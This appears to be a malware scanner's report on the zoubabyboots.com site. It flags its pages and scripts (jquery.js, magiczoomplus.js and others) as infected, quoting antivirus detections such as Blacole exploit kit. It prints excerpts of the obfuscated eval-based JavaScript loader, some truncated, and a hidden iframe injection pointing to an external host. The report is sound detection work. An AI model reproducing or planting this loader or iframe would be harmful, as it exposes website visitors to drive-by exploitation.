Request | Server response | Status |
http://zoubabyboots.com/ | 200 OK Content-Length: 19819 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jitw="s"+"p"+"li"+"t";fwa=window;cug="dy";ampux=document;wuhksn="0x";mbroe=(5-3-1);try{++(ampux.body)}catch(hob){bqzp=false;try{}catch(mqj){bqzp=21;}if(1){mmlcu="17:5d:6c:65:5a:6b:60:66:65:17:6a:69:5e:5d:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:69:5e:5d:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b ...[4116 bytes skipped]... Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clodfeb.Trojan.a31e
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Exploit.JS.Pdfka.gki
- ViRobot
- JS.A.EX-Pdfka.4574.A
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
Malicious iFrame found. The same iFrame was found in 21 websites. size: 6x5 src: http://elite-bijou.com.ua/wp-includes/13x.phpThis URL is marked by Google as suspicious <iframe src="http://elite-bijou.com.ua/wp-includes/13x.php" border="0" width="6" height="5" /> |
http://zoubabyboots.com/scripts/jquery.js | 200 OK Content-Length: 98639 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mhrycp="s"+"p"+"li"+"t";yfwoiu=window;ydp="dy";crvxn=document;nozvhk="0x";goscyx=(5-3-1);try{++(crvxn.body)}catch(dppvj){pvtlxw=false;try{}catch(lbcm){pvtlxw=21;}if(1){yxlvfm="17:5d:6c:65:5a:6b:60:66:65:17:71:6b:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:6b:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3496 bytes are skipped ...c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:6b:5e:27:30:1f:20:32:4:1:74:4:1:74"[mhrycp](":");}yfwoiu=yxlvfm;caoe=[];for(khj=22-20-2;-khj+1408!=0;khj+=1){soxvt=khj;if((0x19==031))caoe+=String.fromCharCode(eval(nozvhk+yfwoiu[1*soxvt])+0xa-goscyx);}gqr=eval;gqr(caoe)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1026
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gki
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/scripts/jquery-1.4.3.min.js | 200 OK Content-Length: 82517 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mhrycp="s"+"p"+"li"+"t";yfwoiu=window;ydp="dy";crvxn=document;nozvhk="0x";goscyx=(5-3-1);try{++(crvxn.body)}catch(dppvj){pvtlxw=false;try{}catch(lbcm){pvtlxw=21;}if(1){yxlvfm="17:5d:6c:65:5a:6b:60:66:65:17:71:6b:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:6b:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3496 bytes are skipped ...c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:6b:5e:27:30:1f:20:32:4:1:74:4:1:74"[mhrycp](":");}yfwoiu=yxlvfm;caoe=[];for(khj=22-20-2;-khj+1408!=0;khj+=1){soxvt=khj;if((0x19==031))caoe+=String.fromCharCode(eval(nozvhk+yfwoiu[1*soxvt])+0xa-goscyx);}gqr=eval;gqr(caoe)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1026
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gki
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://zoubabyboots.com/scripts/magiczoomplus.js | 200 OK Content-Length: 65690 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mhrycp="s"+"p"+"li"+"t";yfwoiu=window;ydp="dy";crvxn=document;nozvhk="0x";goscyx=(5-3-1);try{++(crvxn.body)}catch(dppvj){pvtlxw=false;try{}catch(lbcm){pvtlxw=21;}if(1){yxlvfm="17:5d:6c:65:5a:6b:60:66:65:17:71:6b:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:6b:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3496 bytes are skipped ...c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:6b:5e:27:30:1f:20:32:4:1:74:4:1:74"[mhrycp](":");}yfwoiu=yxlvfm;caoe=[];for(khj=22-20-2;-khj+1408!=0;khj+=1){soxvt=khj;if((0x19==031))caoe+=String.fromCharCode(eval(nozvhk+yfwoiu[1*soxvt])+0xa-goscyx);}gqr=eval;gqr(caoe)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1026
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gki
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/scripts/jquery.nivo.slider.pack.js | 200 OK Content-Length: 14050 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mhrycp="s"+"p"+"li"+"t";yfwoiu=window;ydp="dy";crvxn=document;nozvhk="0x";goscyx=(5-3-1);try{++(crvxn.body)}catch(dppvj){pvtlxw=false;try{}catch(lbcm){pvtlxw=21;}if(1){yxlvfm="17:5d:6c:65:5a:6b:60:66:65:17:71:6b:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:6b:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3496 bytes are skipped ...c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:6b:5e:27:30:1f:20:32:4:1:74:4:1:74"[mhrycp](":");}yfwoiu=yxlvfm;caoe=[];for(khj=22-20-2;-khj+1408!=0;khj+=1){soxvt=khj;if((0x19==031))caoe+=String.fromCharCode(eval(nozvhk+yfwoiu[1*soxvt])+0xa-goscyx);}gqr=eval;gqr(caoe)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1026
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gki
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/scripts/organictabs.jquery.js | 200 OK Content-Length: 7558 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mhrycp="s"+"p"+"li"+"t";yfwoiu=window;ydp="dy";crvxn=document;nozvhk="0x";goscyx=(5-3-1);try{++(crvxn.body)}catch(dppvj){pvtlxw=false;try{}catch(lbcm){pvtlxw=21;}if(1){yxlvfm="17:5d:6c:65:5a:6b:60:66:65:17:71:6b:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:6b:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3496 bytes are skipped ...c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:6b:5e:27:30:1f:20:32:4:1:74:4:1:74"[mhrycp](":");}yfwoiu=yxlvfm;caoe=[];for(khj=22-20-2;-khj+1408!=0;khj+=1){soxvt=khj;if((0x19==031))caoe+=String.fromCharCode(eval(nozvhk+yfwoiu[1*soxvt])+0xa-goscyx);}gqr=eval;gqr(caoe)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1026
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gki
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/womens.php | 200 OK Content-Length: 8816 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jitw="s"+"p"+"li"+"t";fwa=window;cug="dy";ampux=document;wuhksn="0x";mbroe=(5-3-1);try{++(ampux.body)}catch(hob){bqzp=false;try{}catch(mqj){bqzp=21;}if(1){mmlcu="17:5d:6c:65:5a:6b:60:66:65:17:6a:69:5e:5d:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:69:5e:5d:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58
... 3574 bytes are skipped ...59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:69:5e:5d:65:27:30:1f:20:32:4:1:74:4:1:74"[jitw](":");}fwa=mmlcu;wnahvx=[];for(zqv=22-20-2;-zqv+1438!=0;zqv+=1){vfycvt=zqv;if((0x19==031))wnahvx+=String.fromCharCode(eval(wuhksn+fwa[1*vfycvt])+0xa-mbroe);}hjvjj=eval;hjvjj(wnahvx)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clodfeb.Trojan.a31e
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Exploit.JS.Pdfka.gki
- ViRobot
- JS.A.EX-Pdfka.4574.A
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/childrens.php | 200 OK Content-Length: 8816 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jitw="s"+"p"+"li"+"t";fwa=window;cug="dy";ampux=document;wuhksn="0x";mbroe=(5-3-1);try{++(ampux.body)}catch(hob){bqzp=false;try{}catch(mqj){bqzp=21;}if(1){mmlcu="17:5d:6c:65:5a:6b:60:66:65:17:6a:69:5e:5d:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:69:5e:5d:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58
... 3574 bytes are skipped ...59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:69:5e:5d:65:27:30:1f:20:32:4:1:74:4:1:74"[jitw](":");}fwa=mmlcu;wnahvx=[];for(zqv=22-20-2;-zqv+1438!=0;zqv+=1){vfycvt=zqv;if((0x19==031))wnahvx+=String.fromCharCode(eval(wuhksn+fwa[1*vfycvt])+0xa-mbroe);}hjvjj=eval;hjvjj(wnahvx)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clodfeb.Trojan.a31e
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Exploit.JS.Pdfka.gki
- ViRobot
- JS.A.EX-Pdfka.4574.A
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/sorority.php | 200 OK Content-Length: 8816 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jitw="s"+"p"+"li"+"t";fwa=window;cug="dy";ampux=document;wuhksn="0x";mbroe=(5-3-1);try{++(ampux.body)}catch(hob){bqzp=false;try{}catch(mqj){bqzp=21;}if(1){mmlcu="17:5d:6c:65:5a:6b:60:66:65:17:6a:69:5e:5d:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:69:5e:5d:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58
... 3574 bytes are skipped ...59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:69:5e:5d:65:27:30:1f:20:32:4:1:74:4:1:74"[jitw](":");}fwa=mmlcu;wnahvx=[];for(zqv=22-20-2;-zqv+1438!=0;zqv+=1){vfycvt=zqv;if((0x19==031))wnahvx+=String.fromCharCode(eval(wuhksn+fwa[1*vfycvt])+0xa-mbroe);}hjvjj=eval;hjvjj(wnahvx)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clodfeb.Trojan.a31e
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Exploit.JS.Pdfka.gki
- ViRobot
- JS.A.EX-Pdfka.4574.A
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/index.php | 200 OK Content-Length: 19819 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jitw="s"+"p"+"li"+"t";fwa=window;cug="dy";ampux=document;wuhksn="0x";mbroe=(5-3-1);try{++(ampux.body)}catch(hob){bqzp=false;try{}catch(mqj){bqzp=21;}if(1){mmlcu="17:5d:6c:65:5a:6b:60:66:65:17:6a:69:5e:5d:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:69:5e:5d:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b ...[4116 bytes skipped]... Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clodfeb.Trojan.a31e
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Exploit.JS.Pdfka.gki
- ViRobot
- JS.A.EX-Pdfka.4574.A
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
Malicious iFrame found. The same iFrame was found in 21 websites. size: 6x5 src: http://elite-bijou.com.ua/wp-includes/13x.phpThis URL is marked by Google as suspicious <iframe src="http://elite-bijou.com.ua/wp-includes/13x.php" border="0" width="6" height="5" /> |
http://zoubabyboots.com/about.php | 200 OK Content-Length: 8816 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jitw="s"+"p"+"li"+"t";fwa=window;cug="dy";ampux=document;wuhksn="0x";mbroe=(5-3-1);try{++(ampux.body)}catch(hob){bqzp=false;try{}catch(mqj){bqzp=21;}if(1){mmlcu="17:5d:6c:65:5a:6b:60:66:65:17:6a:69:5e:5d:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:69:5e:5d:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58
